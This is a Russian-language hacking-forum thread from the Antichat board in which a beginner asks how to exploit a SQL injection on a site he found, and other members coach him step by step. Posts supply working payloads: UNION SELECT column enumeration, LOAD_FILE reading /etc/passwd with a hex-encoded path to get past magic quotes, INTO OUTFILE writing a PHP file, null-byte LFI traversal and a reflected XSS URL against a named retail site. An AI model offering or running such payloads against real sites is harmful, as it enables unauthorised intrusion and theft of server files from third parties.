Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
08.01.2010, 03:05
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022
Репутация:
4
|
|
подскажите плз, нашел сайт, при вводе [URL]?id=1' появляется ошибка
You have an error in your SQL syntax near '\'' at line 1, но не указана БД, пробовал пинговать сервер на 3306 и 5432 порты, но тоже не там ни там ничего. Воодил разные значения (с кавычками и без),
[URL]?id=1'+GROUP+BY+5+--
[URL]?id=-1'+UNION+SELECT+1,2+--
[URL]?id=-1+union+select+null
но ошибка не меняется, подскажите что я не так делаю?
|
|
|
08.01.2010, 03:05
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от warlok
всмысле ограничивает ? если ты про "common.inc.php"); то нет, ее можно отрезать или нул байтом или кучей слешей.
а от lfi типа ../etc/passwd%00
|
|
|
|
08.01.2010, 03:08
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Gidz
подскажите плз, нашел сайт, при вводе [URL]?id=1' появляется ошибка
You have an error in your SQL syntax near '\'' at line 1, но не указана БД, пробовал пинговать сервер на 3306 и 5432 порты, но тоже не там ни там ничего. Воодил разные значения (с кавычками и без),
[URL]?id=1'+GROUP+BY+5+--
[URL]?id=-1'+UNION+SELECT+1,2+--
[URL]?id=-1+union+select+null
но ошибка не меняется, подскажите что я не так делаю?
подожди правильно так
?id=1'+GROUP+BY+5--+
|
|
|
|
08.01.2010, 03:11
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022
Репутация:
4
|
|
да не, я и с комментариями и без пробовал, не меняется ((
|
|
|
|
08.01.2010, 03:18
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Сообщение от Gidz
подскажите плз, нашел сайт, при вводе [URL]?id=1' появляется ошибка
You have an error in your SQL syntax near '\'' at line 1, но не указана БД, пробовал пинговать сервер на 3306 и 5432 порты, но тоже не там ни там ничего. Воодил разные значения (с кавычками и без),
[URL]?id=1'+GROUP+BY+5+--
[URL]?id=-1'+UNION+SELECT+1,2+--
[URL]?id=-1+union+select+null
но ошибка не меняется, подскажите что я не так делаю?
Судя по ошибке, на сервере включены мэджики, так что воткнуть в запрос кавычку даже и не пытайся. А вообще, былобы неплохо увидеть линк на скулю
|
|
|
|
08.01.2010, 03:21
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Gidz
подскажите плз, нашел сайт, при вводе [URL]?id=1' появляется ошибка
You have an error in your SQL syntax near '\'' at line 1, но не указана БД, пробовал пинговать сервер на 3306 и 5432 порты, но тоже не там ни там ничего. Воодил разные значения (с кавычками и без),
[URL]?id=1'+GROUP+BY+5+--
[URL]?id=-1'+UNION+SELECT+1,2+--
[URL]?id=-1+union+select+null
но ошибка не меняется, подскажите что я не так делаю?
пробуй так
?id=1+order+BY+1--
в принципе неудивительно што ошибка выпадает 
SQL syntax near '\''
0nep@t0p все верно
Последний раз редактировалось 547; 08.01.2010 в 03:27..
|
|
|
|
08.01.2010, 13:03
|
|
Участник форума
Регистрация: 10.11.2009
Сообщений: 122
Провел на форуме:
1245844
Репутация:
199
|
|
Код:
http://rozetka.com.ua/index.php?search_text=%2522%253E%253Cscript%253Ealert%2528%2529%253C%252Fscript%253E&page=search&lang=ru&imageField.x=0&imageField.y=0
[/code] (пассивная)
Какая-то странная реакция.. После 2 алертов открывается доп. активное окно поиска и высвечивается кусок кода " class="sinp" />. Что это значит? )) |
|
|
|
08.01.2010, 13:41
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022
Репутация:
4
|
|
не так тоже не как, ну да ладно, я пробую на новом хосте, там вроде все работает, узнал количество полей, пробую
-1+UNION+SELECT+LOAD_FILE(etc/passwd);
но мне выдается такая ошибка
Unknown column 'etc' in 'field list'
пробую на запись проверить, но пишет не правильный синтаксис
-1+UNION+SELECT+1+INTO+OUTFILE+'/tmp/file.php';
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'/tmp/file.php\'' at line 1
кавычки может ему не нравятся?? без них если написать, то тоже самое, только без слешей '/tmp/file.php'
подскажите нубу плз, что можно попробовать еще??  |
|
|
|
08.01.2010, 13:53
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Gidz
не так тоже не как, ну да ладно, я пробую на новом хосте, там вроде все работает, узнал количество полей, пробую
-1+UNION+SELECT+LOAD_FILE(etc/passwd);
но мне выдается такая ошибка
Unknown column 'etc' in 'field list'
пробую на запись проверить, но пишет не правильный синтаксис
-1+UNION+SELECT+1+INTO+OUTFILE+'/tmp/file.php';
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'/tmp/file.php\'' at line 1
кавычки может ему не нравятся?? без них если написать, то тоже самое, только без слешей '/tmp/file.php'
подскажите нубу плз, что можно попробовать еще?? В кавычках дело, а без кавычек нельзя.
Последний раз редактировалось Ctacok; 08.01.2010 в 16:48..
|
|
|
|
08.01.2010, 16:26
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
2Gidz, при меджик квотес у тебя инто оутфайл/дампфайл работать не будет.
По поводу лоад файл:
1) -1+UNION+SELECT+LOAD_FILE(etc/passwd); <------ Это не верно, нужны кавычки:
-1+UNION+SELECT+LOAD_FILE('/etc/passwd');
А так как у тебя меджик квотес - нужно хэксить, или чарить:
-1+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764) ;
Что бы не было дальнейших вопросов - скажу, что в инот оутфайл/дампфайл путь хексить/чарить НЕЛЬЗЯ.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
